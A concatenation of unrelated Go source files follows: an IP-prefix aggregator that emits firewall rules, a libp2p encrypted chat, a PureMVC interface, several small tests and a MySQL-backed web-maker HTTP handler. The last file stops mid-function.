const OUTPUT_EXTRA = 2
const OUTPUT_DEBUG = 3
// convert from network prefix to trie index
func net2i(u uint32, p uint8) uint32 {
return ((1<<p)-1)+(u>>(32-p))
}
// convert from trie index to network prefix
func i2net(u uint32, p uint8) uint32 {
if p == 0 {
return 0
}
return (((u+1)<<(32-p))&0xffffffff)
}
// convert from trie index to network prefix length
func i2plen(u uint32) uint32 {
var p uint32
for p = 1; p <= 32; p++ {
if u<((1<<p)-1) {
return p-1;
}
}
return 0;
}
// format uint32 network prefix to dotted notation
func u32toipv4(u uint32) string {
return fmt.Sprintf("%d.%d.%d.%d", ((u>>24)&0xff), ((u>>16)&0xff), ((u>>8)&0xff), (u&0xff))
}
///////////////////////////////////////////////////////////////////////////////
//
// main program
//
func main() {
shortestPrefix := 32
longestPrefix := 0
trie := make([]uint8, 1<<25); // gaah
ipv4Prefixes := make([]string, 0);
ipv6Prefixes := make([]string, 0);
asList := make([]int, 0);
ccList := make([]string, 0);
// read flags from command line
flag.StringVar(&outputFormat, "o", "ipt", "Output format <ipt|nft|pf|junos|plain>");
flag.IntVar(&verbosityLevel, "v", 1, "Output vebosity <0..3>");
flag.StringVar(&queryType, "q", "as", "Query prefixes by ASNs or ISO country codes <as|cc>");
flag.Parse()
args := flag.Args()
if len(args) < 1 {
flag.PrintDefaults()
return
}
if queryType == "as" {
// read ASNs from command line
for i:= 0; i < len(args); i++ {
as, err := strconv.Atoi(args[i])
if (err == nil) {
asList=append(asList, as)
}
}
// fetch network prefixes for all AS numbers specified on the command line
asnText:=""
for i := 0; i < len(asList); i++ {
ann4, ann6, err := getASPrefixes(asList[i], &ipv4Prefixes, &ipv6Prefixes)
if err != nil {
log.Fatal("Failed to query prefixes for AS - aborting")
return
} else {
asnText=fmt.Sprintf("%s%d ", asnText, asList[i])
if verbosityLevel > OUTPUT_NORMAL {
fmt.Printf("# AS%d announces %d IPv4 prefixes and %d IPv6 prefixes\n", asList[i], ann4, ann6)
}
}
}
if verbosityLevel > OUTPUT_QUIET {
fmt.Printf("# Successfully queried ASNs: %s\n", asnText);
}
} else {
// args has ISO country codes
ccText := ""
for i:= 0; i < len(args); i++ {
// cc is args[i]
if len(args[i]) == 2 {
ccList=append(ccList, args[i])
// query the country from RIPEstat
ann4, ann6, err := getCountryPrefixes(args[i], &ipv4Prefixes, &ipv6Prefixes)
if err != nil {
log.Fatal("Failed to query prefixes for country - aborting")
return
} else {
ccText=fmt.Sprintf("%s%s ", ccText, args[i])
if verbosityLevel > OUTPUT_NORMAL {
fmt.Printf("# Country '%s' is associated with %d IPv4 prefixes and %d IPv6 prefixes\n", args[i], ann4, ann6)
}
}
} else {
// invalid country code
log.Fatal("Invalid country code specified");
}
}
if verbosityLevel > OUTPUT_QUIET {
fmt.Printf("# Successfully queried CCs: %s\n", ccText);
}
}
// all network prefixes are now loaded - time to start aggregating them!
if verbosityLevel > OUTPUT_QUIET {
fmt.Printf("# Found a total of %d IPv4 prefixes and %d IPv6 prefixes\n", len(ipv4Prefixes), len(ipv6Prefixes));
}
// we'll aggregate prefixes by first arranging them into a trie. a node marked 0 means
// no prefix, 1-32 means an exact or more specific prefix exists.
// a node with an exact prefix is a leaf node in the tree.
//
// because generally no longer prefixes than /24 are accepted on the route table,
// we can brute force it and allocate a 2^25 byte buffer to store our trie
// breadth-first. storing as nodes with references would of course consume less
// memory.
for i := 0; i < len(ipv4Prefixes); i++ {
prefixRE, err := regexp.Compile("^([0-9.]{7,15})/([0-9]{1,2})$")
if err == nil {
prefixMatches := prefixRE.FindStringSubmatch(ipv4Prefixes[i])
if len(prefixMatches) == 3 {
prefixLen, err := strconv.Atoi(prefixMatches[2])
if err == nil {
// skip longer prefixes than /24 - they wouldn't be routed anyway
if prefixLen > 24 {
if verbosityLevel > OUTPUT_NORMAL {
fmt.Printf("# Skipping prefix %s for being longer than 24 bits\n", ipv4Prefixes[i])
}
continue
}
// extract individual bytes from the prefix
bytesRE, err := regexp.Compile("^([0-9]{1,3}).([0-9]{1,3}).([0-9]{1,3}).([0-9]{1,3})$")
if err == nil {
bytesMatches := bytesRE.FindStringSubmatch(prefixMatches[1])
if len(bytesMatches) == 5 {
// prefix looks ok, convert to uint32
var network uint32
for j := 0; j < 4; j++ {
pb, err := strconv.Atoi(bytesMatches[1+j])
if err == nil && pb >= 0 && pb < 256 {
network = network | (uint32(pb) << uint((3-j)*8))
}
}
if verbosityLevel == OUTPUT_DEBUG {
fmt.Printf("# Prefix %s (0x%08x len %d) has index 0x%08x\n", ipv4Prefixes[i], network, prefixLen, net2i(network, uint8(prefixLen)))
}
// store the prefix into the trie
for k :=1; k <= prefixLen; k++ {
offset := net2i(network, uint8(k))
if trie[offset] == 0 || trie[offset] > uint8(prefixLen) {
trie[offset]=uint8(prefixLen)
}
}
}
} else {
// regex failed to compile
}
} else {
log.Fatal("Invalid prefix length");
}
if prefixLen<shortestPrefix {
shortestPrefix=prefixLen;
}
if prefixLen>longestPrefix {
longestPrefix=prefixLen;
}
}
} else {
log.Fatal("Invalid IPv4 prefix");
}
}
if verbosityLevel > OUTPUT_QUIET {
fmt.Printf("# Shortest IPv4 prefix is %d bits and longest %d bits\n", shortestPrefix, longestPrefix);
}
// now traverse the trie, starting from the longest observed prefix length. if a node
// and it's sibling are leaf nodes, they can be set to zero and the parent changed to a leaf.
for p := longestPrefix; p >= shortestPrefix; p-- {
for i := net2i(0, uint8(p)); i < net2i(0, uint8(p+1)); i+=2 {
if trie[i]==uint8(p) && trie[i+1]==uint8(p) {
if verbosityLevel > OUTPUT_NORMAL {
fmt.Printf("# Aggregating %s/%d and %s/%d to %s/%d\n",
u32toipv4(i2net(i, uint8(p))), p,
u32toipv4(i2net(i+1, uint8(p))), p,
u32toipv4(i2net(i>>1, uint8(p-1))), (p-1));
}
trie[i]=0;
trie[i+1]=0;
trie[i>>1]=uint8(p-1);
if shortestPrefix > p-1 {
shortestPrefix=p-1;
}
}
}
// scan through the prefixes again, this time to see if a less specific
// prefix exists.
for i := net2i(0, uint8(p)); i < net2i(0, uint8(p+1)); i++ {
if trie[i] == uint8(p) {
for pp := 1; pp <= (p-shortestPrefix); pp++ {
pi := net2i(i2net(i, uint8(p)), uint8(p-pp));
if trie[pi] == uint8(p-pp) {
if verbosityLevel > OUTPUT_NORMAL {
fmt.Printf("# Removing prefix %s/%d because less specific prefix %s/%d exists\n",
u32toipv4(i2net(i, uint8(p))), p,
u32toipv4(i2net(pi, uint8(p-pp))), (p-pp));
}
trie[i] = 0
break;
}
}
}
}
}
// finally, traverse the trie once more time to collect all remaining leaf nodes. they are
// used to generate the final list of prefixes
aggregatedPrefixes := make([]string, 0)
for p := longestPrefix; p >= shortestPrefix; p-- {
for i := net2i(0, uint8(p)); i < net2i(0, uint8(p+1)); i++ {
if trie[i] == uint8(p) {
aggregatedPrefixes = append(aggregatedPrefixes, fmt.Sprintf("%s/%d", u32toipv4(i2net(i, uint8(p))), p))
}
}
}
if verbosityLevel > OUTPUT_QUIET {
fmt.Printf("# Final list contains %d IPv4 prefixes\n", len(aggregatedPrefixes))
}
// now output the final list of prefixes collected from the trie
listName := queryType; // "as" or "cc"
switch queryType {
case "as":
for i := 0; i < len(asList); i++ {
listName = fmt.Sprintf("%s-%d", listName, asList[i])
}
case "cc":
for i := 0; i < len(ccList); i++ {
listName = fmt.Sprintf("%s-%s", listName, ccList[i])
}
}
switch outputFormat {
case "ipt":
outputIptables(listName, &aggregatedPrefixes)
case "nft":
outputNptables(listName, &aggregatedPrefixes)
case "pf":
outputPf(listName, &aggregatedPrefixes)
case "junos":
outputJunos(listName, &aggregatedPrefixes)
case "plain":
outputPlain(&aggregatedPrefixes)
}
}
|
package main
import (
"bufio"
"context"
"encoding/json"
"fmt"
"os"
"sync"
"github.com/gtank/cryptopasta"
"github.com/fentec-project/gofe/abe"
"github.com/joho/godotenv"
"github.com/libp2p/go-libp2p"
dht "github.com/libp2p/go-libp2p-kad-dht"
pubsub "github.com/libp2p/go-libp2p-pubsub"
"github.com/libp2p/go-libp2p/core/host"
"github.com/libp2p/go-libp2p/core/peer"
"github.com/multiformats/go-multiaddr"
drouting "github.com/libp2p/go-libp2p/p2p/discovery/routing"
dutil "github.com/libp2p/go-libp2p/p2p/discovery/util"
)
var config Config
type AbePeerPara struct {
abefame *abe.FAME
mpk *abe.FAMEPubKey
msk *abe.FAMESecKey
msp *abe.MSP
}
var peerAbePara AbePeerPara
func getAbePara() AbePeerPara {
var abepara AbePeerPara
err := godotenv.Load("../AbeSetup/.env")
if err != nil {
panic(err)
}
abefameJSON := os.Getenv("ABEFAME")
err = json.Unmarshal([]byte(abefameJSON), &abepara.abefame)
if err != nil {
panic(err)
}
mpkJSON := os.Getenv("MPK")
err = json.Unmarshal([]byte(mpkJSON), &abepara.mpk)
if err != nil {
panic(err)
}
mskJSON := os.Getenv("MSK")
err = json.Unmarshal([]byte(mskJSON), &abepara.msk)
if err != nil {
panic(err)
}
mspJSON := os.Getenv("MSP")
err = json.Unmarshal([]byte(mspJSON), &abepara.msp)
if err != nil {
panic(err)
}
return abepara
}
func main() {
config, _ = ParseFlags()
ctx := context.Background()
peerAbePara = getAbePara()
absKey := cryptopasta.NewEncryptionKey()
h, err := libp2p.New(libp2p.ListenAddrs([]multiaddr.Multiaddr(config.ListenAddresses)...))
if err != nil {
panic(err)
}
go discoverPeers(ctx, h)
ps, err := pubsub.NewGossipSub(ctx, h)
if err != nil {
panic(err)
}
topic, err := ps.Join(config.TopicString)
if err != nil {
panic(err)
}
go streamConsoleTo(ctx, topic, absKey)
sub, err := topic.Subscribe()
if err != nil {
panic(err)
}
printMessagesFrom(ctx, sub)
}
func initDHT(ctx context.Context, h host.Host) *dht.IpfsDHT {
// Start a DHT, for use in peer discovery. We can't just make a new DHT
// client because we want each peer to maintain its own local copy of the
// DHT, so that the bootstrapping node of the DHT can go down without
// inhibiting future peer discovery.
kademliaDHT, err := dht.New(ctx, h)
if err != nil {
panic(err)
}
if err = kademliaDHT.Bootstrap(ctx); err != nil {
panic(err)
}
var wg sync.WaitGroup
for _, peerAddr := range config.BootstrapPeers {
peerinfo, _ := peer.AddrInfoFromP2pAddr(peerAddr)
wg.Add(1)
go func() {
defer wg.Done()
if err := h.Connect(ctx, *peerinfo); err != nil {
fmt.Println("Bootstrap warning:", err)
}
}()
}
wg.Wait()
return kademliaDHT
}
func discoverPeers(ctx context.Context, h host.Host) {
kademliaDHT := initDHT(ctx, h)
routingDiscovery := drouting.NewRoutingDiscovery(kademliaDHT)
dutil.Advertise(ctx, routingDiscovery, config.TopicString)
// Look for others who have announced and attempt to connect to them
anyConnected := false
for !anyConnected {
fmt.Println("Searching for peers...")
peerChan, err := routingDiscovery.FindPeers(ctx, config.TopicString)
if err != nil {
panic(err)
}
for peer := range peerChan {
if peer.ID == h.ID() {
continue // No self connection
}
err := h.Connect(ctx, peer)
if err != nil {
// fmt.Println("Failed connecting to ", peer.ID.Pretty(), ", error:", err)
} else {
fmt.Println("Connected to:", peer.ID.Pretty())
anyConnected = true
}
}
}
fmt.Println("Peer discovery complete")
}
func sendKey(ctx context.Context, topic *pubsub.Topic, key *[32]byte) {
sendData, _ := peerAbePara.abefame.Encrypt(string(key[:]), peerAbePara.msp, peerAbePara.mpk)
sendDataJson, _ := json.Marshal(sendData)
sendDatastr := string(sendDataJson)
err := topic.Publish(ctx, []byte(sendDatastr))
if err != nil {
fmt.Println("### Publish error:", err)
}
}
func streamSend(ctx context.Context, topic *pubsub.Topic, key *[32]byte) {
dir, err := os.Open(config.MessageDirPath)
if err != nil {
panic(err)
fmt.Println(config.MessageDirPath)
}
defer dir.Close()
files, err := dir.Readdir(0)
if err != nil {
panic(err)
}
for _, file := range files {
filePath := config.MessageDirPath + "/" + file.Name()
file, err := os.Open(filePath)
if err != nil {
panic(err)
}
defer file.Close()
reader := bufio.NewReader(file)
sendDataGot, err := reader.ReadString('\n')
if err != nil {
panic(err)
}
sendDatastr, err := cryptopasta.Encrypt([]byte(sendDataGot), key)
if err != nil {
panic(err)
}
if err = topic.Publish(ctx, []byte(sendDatastr)); err != nil {
fmt.Println("### Publish error:", err)
}
}
}
func streamConsoleTo(ctx context.Context, topic *pubsub.Topic, key *[32]byte) {
reader := bufio.NewReader(os.Stdin)
for {
s, err := reader.ReadString('\n')
if err != nil {
panic(err)
}
if s == "send AES Key\n" {
sendKey(ctx, topic, key)
} else if s == "send msg kdd\n" {
streamSend(ctx, topic, key)
} else {
// sendData, _ := peerAbePara.abefame.Encrypt(s, peerAbePara.msp, peerAbePara.mpk)
// sendDataJson, _ := json.Marshal(sendData)
// sendDatastr := string(sendDataJson)
sendDatastr, err := cryptopasta.Encrypt([]byte(s), key)
if err != nil {
panic(err)
}
err = topic.Publish(ctx, []byte(sendDatastr))
if err != nil {
fmt.Println("### Publish error:", err)
}
}
}
}
func printMessagesFrom(ctx context.Context, sub *pubsub.Subscription) {
for {
m, err := sub.Next(ctx)
if err != nil {
panic(err)
}
fmt.Println(m.ReceivedFrom, ": ", string(m.Message.Data))
// inputBytes := []byte(string(m.Message.Data))
// ioutil.WriteFile("output.txt", inputBytes, 0644)
}
}
|
//
// IProxy.go
// PureMVC Go Multicore
//
// Copyright(c) 2019 Saad Shams <saad.shams@puremvc.org>
// Your reuse is governed by the Creative Commons Attribution 3.0 License
//
package interfaces
/*
The interface definition for a PureMVC Proxy.
In PureMVC, IProxy implementors assume these responsibilities:
* Implement a common method which returns the name of the Proxy.
* Provide methods for setting and getting the data object.
Additionally, IProxys typically:
* Maintain references to one or more pieces of model data.
* Provide methods for manipulating that data.
* Generate INotifications when their model data changes.
* Expose their name as a public static const called NAME, if they are not instantiated multiple times.
* Encapsulate interaction with local or remote services used to fetch and persist model data.
*/
type IProxy interface {
INotifier
/*
Get the Proxy name
*/
GetProxyName() string
/*
Set the data object
*/
SetData(data interface{})
/*
Get the data object
*/
GetData() interface{}
/*
Called by the Model when the Proxy is registered
*/
OnRegister()
/*
Called by the Model when the Proxy is removed
*/
OnRemove()
}
|
package model
type RelationType struct {
Relation Relation `json:"relation"`
}
type Relation int
const(
NotFollowing Relation = iota
Following
NotAccepted
Blocked
Blocking
)
|
package util
const TemplatePartialImport = `
import %s from "%s"`
const TemplatePartialUse = `<%s />
`
const TemplatePartialUseConfig = `<%s />
`
const TemplateConfigField = `
<details className="config-field" data-expandable="%t"%s>
<summary>
%s` + "`%s`" + ` <span className="config-field-required" data-required="%t">required</span> <span className="config-field-type">%s</span> <span className="config-field-default">%s</span> <span className="config-field-enum">%s</span> {#%s}
%s
</summary>
%s
</details>
`
const TemplateFunctionRef = `
<details className="config-field -function" data-expandable="%t"%s>
<summary>
%s` + "`%s`" + ` <span className="config-field-type">%s</span> <span className="config-field-enum">%s</span> <span className="config-field-default -return">%s</span> <span className="config-field-required" data-required="%t">pipeline only</span> {#%s}
%s
</summary>
%s
</details>
`
|
package addition_test
import (
"testing"
"github.com/Charliekenney23/terraform-provider-math/internal/testacc"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
const dataSourceName = "data.math_addition.test"
func TestDataSource_basic(t *testing.T) {
resource.ParallelTest(t, resource.TestCase{
PreCheck: func() { testacc.PreCheck(t) },
Providers: testacc.Providers(),
Steps: []resource.TestStep{
{
Config: configBasic,
Check: resource.ComposeTestCheckFunc(
resource.TestCheckResourceAttr(dataSourceName, "addend", "2"),
resource.TestCheckResourceAttr(dataSourceName, "augend", "3"),
resource.TestCheckResourceAttr(dataSourceName, "sum", "5"),
),
},
},
})
}
const configBasic = `
data "math_addition" "test" {
addend = 2
augend = 3
}`
|
package rdb_test
import (
"fmt"
"sync"
"testing"
)
import (
"github.com/jinzhu/gorm"
"github.com/stretchr/testify/assert"
"github.com/xozrc/cqrs/eventsourcing"
. "github.com/xozrc/cqrs/eventsourcing/rdb"
)
var _ = fmt.Print
const (
dialect = "mysql"
user = "root"
password = "root"
host = "127.0.0.1:3306"
dbName = "event_store_test"
charset = "utf8"
)
const (
partitionKey = "test"
)
var (
version int64 = 0
)
var (
once sync.Once
st *RdbEventStore
)
func setup() {
once.Do(
func() {
dbArgs := fmt.Sprintf("%s:%s@tcp(%s)/%s?charset=%s", user, password, host, dbName, charset)
s, err := gorm.Open(dialect, dbArgs)
if err != nil {
panic(err)
}
s.LogMode(true)
st, err = NewStore(s)
if err != nil {
panic(err)
}
},
)
}
func save() error {
ed := &eventsourcing.EventEntity{}
version += 1
ed.Version = version
eds := make([]*eventsourcing.EventEntity, 0)
eds = append(eds, ed)
return st.Save(partitionKey, eds)
}
func load() error {
setup()
eds, err := st.Load(partitionKey, 0)
if err != nil {
return err
}
if len(eds) == 0 {
return nil
}
version = eds[len(eds)-1].Version
return nil
}
func TestSave(t *testing.T) {
err := load()
if !assert.NoError(t, err, "save error") {
return
}
err = save()
if !assert.NoError(t, err, "save error") {
return
}
}
|
package handler
import (
"crypto/rand"
"database/sql"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"net/url"
"os"
"path"
"reflect"
"strconv"
"strings"
"github.com/Jonny-exe/web-maker/web-maker-server/httpd/export"
"github.com/Jonny-exe/web-maker/web-maker-server/httpd/filecreator"
"github.com/Jonny-exe/web-maker/web-maker-server/httpd/models" // "go.mongodb.org/mongo-driver/bson"
"github.com/joho/godotenv"
_ "github.com/go-sql-driver/mysql"
)
// Blank
// InsertTokenRecovery ..
func InsertTokenRecovery(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
var req models.Recovery_key
json.NewDecoder(r.Body).Decode(&req)
// insForm, err := db.Prepare("insert into token_recovery(token, recovery) values(?,?)")
insert, err := db.Prepare("INSERT INTO token_recovery(token, recovery) VALUES(?, ?)")
if err != nil {
log.Fatal(err)
}
uuid := createUUID()
uuid = uuid[0:29] // This has to be cut because mysql char(30)
log.Println(reflect.TypeOf(uuid))
insert.Exec(uuid, req.Recovery_key)
defer insert.Close()
json.NewEncoder(w).Encode(uuid)
return
}
func createUUID() string {
db := getConnection()
defer db.Close()
b := make([]byte, 16)
_, err := rand.Read(b)
if err != nil {
log.Fatal(err)
}
uuid := fmt.Sprintf("%x-%x-%x-%x-%x",
b[0:4], b[4:6], b[6:8], b[8:10], b[10:])
var uuidResult interface{}
err = db.QueryRow("select token from token_recovery where token=?", uuid).Scan(&uuidResult)
log.Println(uuidResult)
if uuidResult != nil {
createUUID()
}
return uuid
}
// InsertTokenObject ...
func InsertTokenObject(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
// Before doing this you have to check if the token alredy exists
var req models.TokenAndObject
json.NewDecoder(r.Body).Decode(&req)
bytes, err := json.Marshal(req.Object)
stringyfiedObject := string(bytes)
insert, err := db.Prepare("INSERT INTO token_object(token, object) VALUES(?, ?)")
if err != nil {
log.Fatal(err)
}
insert.Exec(req.Token, stringyfiedObject)
defer insert.Close()
json.NewEncoder(w).Encode(http.StatusOK)
return
}
// UpdateTokenObject ..
func UpdateTokenObject(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
var req models.TokenAndObject
json.NewDecoder(r.Body).Decode(&req)
err := db.Ping()
log.Println("Ping: ", db.Ping())
if err != nil {
log.Fatal("Ping failed: ", err)
}
bytes, err := json.Marshal(req.Object)
if err != nil {
log.Fatal(err)
}
stringyfiedObject := string(bytes)
update, err := db.Prepare("update token_object set object=? where token=?")
defer update.Close()
if err != nil {
json.NewEncoder(w).Encode(http.StatusInternalServerError)
log.Fatal("Update error: ", err)
}
res, err := update.Exec(stringyfiedObject, req.Token)
if err != nil {
json.NewEncoder(w).Encode(http.StatusInternalServerError)
log.Fatal(err)
}
rowAffected, err := res.RowsAffected()
if err != nil {
json.NewEncoder(w).Encode(http.StatusInternalServerError)
log.Fatal("Row Affectd error: ", err)
}
log.Println(rowAffected)
json.NewEncoder(w).Encode(http.StatusOK)
return
}
// GetTokenFromRecovery ...
func GetTokenFromRecovery(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
var req models.Recovery_key
var token string
json.NewDecoder(r.Body).Decode(&req)
err := db.QueryRow("select token from token_recovery where recovery=?", req.Recovery_key).Scan(&token)
if err != nil {
// log.Fatal(err) not check
json.NewEncoder(w).Encode(500)
return
}
log.Println(token)
json.NewEncoder(w).Encode(token)
return
}
// GetObjectFromToken ..
func GetObjectFromToken(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
var req models.Token
var objectString string
var object interface{}
json.NewDecoder(r.Body).Decode(&req)
err := db.QueryRow("select object from token_object where token=? ", req.Token).Scan(&objectString)
if err != nil {
// log.Fatal(err) not check
}
log.Println(objectString)
bytes := []byte(objectString)
json.Unmarshal(bytes, &object)
log.Println(reflect.TypeOf(object))
json.NewEncoder(w).Encode(object)
return
}
// var db *sql.DB
var connectionKey string
// EnvDir is the .env directory path
var EnvDir string
// TempFilesDir is the directory for creating temp files
// var TempFilesDir string
// Connect ...
func Connect() {
// sql.Register("mysql", &MySQLDriver{})
// db, err = sql.Register("mysql")
db, err := sql.Open("mysql", connectionKey)
if err != nil {
log.Fatal("Error login in mysql: ", err)
}
defer db.Close()
err = db.Ping()
log.Println("Ping: ", db.Ping())
if err != nil {
log.Fatal("Ping failed: ", err)
}
_, err = db.Exec("CREATE DATABASE IF NOT EXISTS web_maker")
if err != nil {
log.Fatal("Error creating database: ", err)
}
_, err = db.Exec("USE web_maker")
if err != nil {
log.Fatal("Error selecting database: ", err)
}
_, err = db.Exec("CREATE TABLE IF NOT EXISTS token_object ( token varchar(30), object longtext)")
if err != nil {
log.Fatal("Error creating token_object table: ", err)
}
_, err = db.Exec("CREATE TABLE IF NOT EXISTS token_recovery ( token varchar(30), recovery varchar(30))")
if err != nil {
log.Fatal("Error creating token_recovery table: ", err)
}
log.Println(reflect.TypeOf(db))
// hanlder.Insert()
return
}
func getConnection() *sql.DB {
var db *sql.DB
db, err := sql.Open("mysql", connectionKey)
if err != nil {
log.Fatal("Error login in mysql: ", err)
}
_, err = db.Exec("USE web_maker")
return db
}
// ExportIntoHTML ...
func ExportIntoHTML(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
var req models.Token
var objectString string
var object models.Content
// connectionKey := os.Getenv("BEAUTIFY_CODE")
json.NewDecoder(r.Body).Decode(&req)
err := db.QueryRow("select object from token_object where token=? ", req.Token).Scan(&objectString)
if err != nil {
log.Fatal(err)
}
bytes := []byte(objectString)
json.Unmarshal(bytes, &object)
// export.ClassIndex = 0
HTMLResult, CSSResult := export.Export(object, 0)
// result = HTMLBegining + result + HTMLEnd
beautifiedHTMLResult := beautifyHTMLCode(HTMLResult)
beautifiedCSSResult := beautifyCSSCode(CSSResult)
result := joinCSSandHTML(beautifiedHTMLResult, beautifiedCSSResult)
filecreator.ImportHTMLToFile(result, req.Token)
json.NewEncoder(w).Encode(http.StatusOK)
return
}
func joinCSSandHTML(HTML string, CSS string) string {
index := strings.Index(HTML, "<head>")
result := HTML[:index+6] + "\n<style> \n" + CSS + "\n\n</style>" + HTML[index+6:] // maybe add '\n' between html and style
return result
}
func beautifyHTMLCode(htmlCode string) string {
endpoint := "https://www.10bestdesign.com/dirtymarkup/api/html"
data := url.Values{}
data.Set("code", htmlCode)
client := &http.Client{}
r, err := http.NewRequest("POST", endpoint, strings.NewReader(data.Encode())) // URL-encoded payload
if err != nil {
log.Fatal(err)
}
r.Header.Add("Content-Type", "application/x-www-form-urlencoded")
r.Header.Add("Content-Length", strconv.Itoa(len(data.Encode())))
res, err := client.Do(r)
if err != nil {
log.Fatal(err)
}
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
if err != nil {
log.Fatal(err)
}
stringBody := string(body)
type req struct {
Clean string `json:"clean"`
}
var result req
bytes := []byte(stringBody)
json.Unmarshal(bytes, &result)
return string(result.Clean)
}
func beautifyCSSCode(CSSCode string) string {
endpoint := "https://www.10bestdesign.com/dirtymarkup/api/css"
data := url.Values{}
data.Set("code", CSSCode)
client := &http.Client{}
r, err := http.NewRequest("POST", endpoint, strings.NewReader(data.Encode())) // URL-encoded payload
if err != nil {
log.Fatal(err)
}
r.Header.Add("Content-Type", "application/x-www-form-urlencoded")
r.Header.Add("Content-Length", strconv.Itoa(len(data.Encode())))
res, err := client.Do(r)
if err != nil {
log.Fatal(err)
}
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
if err != nil {
log.Fatal(err)
}
stringBody := string(body)
type req struct {
Clean string `json:"clean"`
}
var result req
bytes := []byte(stringBody)
json.Unmarshal(bytes, &result)
return string(result.Clean)
}
// RemoveFile ...
func RemoveFile(w http.ResponseWriter, r *http.Request) {
var req models.Token
json.NewDecoder(r.Body).Decode(&req)
resultStatus := filecreator.RemoveFile(req.Token)
json.NewEncoder(w).Encode(resultStatus)
}
// DoesRecoveryKeyExist ..
func DoesRecoveryKeyExist(w http.ResponseWriter, r *http.Request) {
db := getConnection()
defer db.Close()
var req models.Recovery_key
json.NewDecoder(r.Body).Decode(&req)
var checkResult interface{}
err := db.QueryRow("select token from token_recovery where recovery=?", req.Recovery_key).Scan(&checkResult)
log.Println(checkResult)
if err != nil {
// This is error will appear every time the recovery doesnt exist yet.
}
if checkResult != nil {
json.NewEncoder(w).Encode(500)
return
}
json.NewEncoder(w).Encode(http.StatusOK)
return
}
// Test ...
func Test(w http.ResponseWriter, r *http.Request) {
}
// GetDirs ..
func GetDirs() {
var err error
ex, err := os.Executable()
if err != nil {
log.Fatal(err)
}
log.Print("Executable is ", ex)
dir := path.Dir(ex)
log.Println("Dir of executable is ", "/homa/a/Documents/GitHub/web-maker/web-maker-server/httpd/")
if err != nil {
log.Fatal("Error connecting to db: ", err)
}
log.Println("Passed ping")
dir = os.Getenv("WEB_MAKER_ROOT")
log.Println("Env variable GO_MESSAGES_DIR is: ", dir)
if dir == "" {
log.Println("Error: GO_MESSAGES_DIR is not set.")
log.Println("Error: Set it like: export GO_MESSAGES_DIR=\"/home/user/Documents/GitHub/go-server/httpd\"")
}
enverr := godotenv.Load(dir + "/.env")
if enverr != nil {
log.Println("Error loading .env file: ", enverr)
}
// e.g.: export GO_MESSAGES_DIR="/home/a/Documents/GitHub/go-server/httpd"
dir = os.Getenv("WEB_MAKER_ROOT")
// dir = "/home/a/Documents/GitHub/web-maker/web-maker-server/httpd"
log.Println("Env variable WEB_MAKER_ROOT is: ", dir)
if dir == "" {
log.Println("Error: WEB_MAKER_ROOT is not set.")
log.Println("Error: Set it like: export WEB_MAKER_ROOT=\"/home/user/Documents/GitHub/web-maker\"")
}
// enverr := godotenv.Load()
// log.Fatal("Error loading env file", enverr)
log.Println("Connecting to MongoDB")
connectionKey = os.Getenv("DB_CONNECTION")
log.Println("DB_CONNECTION: ", connectionKey)
// TempFilesDir = os.Getenv("TEMP_FILES_DIR")
// log.Println("TEMP_FILES_DIR: ", TempFilesDir)
// filecreator.RemoveAllFiles()
}
|
package databasemp
import (
"github.com/constant-money/constant-chain/common"
)
type DBMemmpoolLogger struct {
log common.Logger
}
func (dbLogger *DBMemmpoolLogger) Init(inst common.Logger) {
dbLogger.log = inst
}
// Global instant to use
var Logger = DBMemmpoolLogger{}
|
package main
import (
"fmt"
"reflect"
"testing"
)
func TestPadding(t *testing.T) {
tests := map[string]struct {
mn [][]int
want [][]int
}{
"1": {
mn: [][]int{
{0, 2, 3},
{4, 5, 6},
},
want: [][]int{
{0, 0, 0},
{0, 5, 6},
},
},
"2": {
mn: [][]int{
{1, 0, 3},
{4, 5, 6},
},
want: [][]int{
{0, 0, 0},
{4, 0, 6},
},
},
"3": {
mn: [][]int{
{1, 2, 3},
{4, 5, 0},
},
want: [][]int{
{1, 2, 0},
{0, 0, 0},
},
},
"4": {
mn: [][]int{
{1, 2, 3, 4, 5},
{6, 7, 8, 0, 10},
{11, 12, 13, 14, 15},
{16, 17, 18, 19, 20},
},
want: [][]int{
{1, 2, 3, 0, 5},
{0, 0, 0, 0, 0},
{11, 12, 13, 0, 15},
{16, 17, 18, 0, 20},
},
},
"5": {
mn: [][]int{
{1, 2, 3, 4, 5, 6},
{7, 8, 9, 10, 11, 12},
{13, 14, 15, 16, 17, 18},
{19, 20, 21, 22, 23, 24},
{25, 26, 27, 28, 29, 30},
{31, 32, 33, 34, 35, 0},
},
want: [][]int{
{1, 2, 3, 4, 5, 0},
{7, 8, 9, 10, 11, 0},
{13, 14, 15, 16, 17, 0},
{19, 20, 21, 22, 23, 0},
{25, 26, 27, 28, 29, 0},
{0, 0, 0, 0, 0, 0},
},
},
"6": {
mn: [][]int{
{1, 2, 3, 4, 5, 6},
{7, 8, 9, 10, 11, 12},
{13, 0, 15, 16, 17, 18},
{19, 20, 21, 22, 23, 24},
{25, 26, 27, 28, 29, 30},
{31, 32, 33, 34, 35, 0},
},
want: [][]int{
{1, 0, 3, 4, 5, 0},
{7, 0, 9, 10, 11, 0},
{0, 0, 0, 0, 0, 0},
{19, 0, 21, 22, 23, 0},
{25, 0, 27, 28, 29, 0},
{0, 0, 0, 0, 0, 0},
},
},
}
for name, tt := range tests {
t.Run(name, func(t *testing.T) {
// fmt.Println(tt.mn)
printMatrix(tt.mn)
// printMatrix(ninetyDegreeRotation(tt.mn))
nmn := padding(tt.mn)
printMatrix(nmn)
if !reflect.DeepEqual(nmn, tt.want) {
t.Errorf("got: %v, want: %v", nmn, tt.want)
}
mn := padding2(tt.mn)
printMatrix(mn)
if !reflect.DeepEqual(mn, tt.want) {
t.Errorf("got: %v, want: %v", mn, tt.want)
}
})
}
}
func printMatrix(mn [][]int) {
for _, v1 := range mn {
for _, v2 := range v1 {
fmt.Printf("%d, ", v2)
}
fmt.Println()
}
}
func padding(mn [][]int) [][]int {
var row []int
var column []int
for i, v1 := range mn {
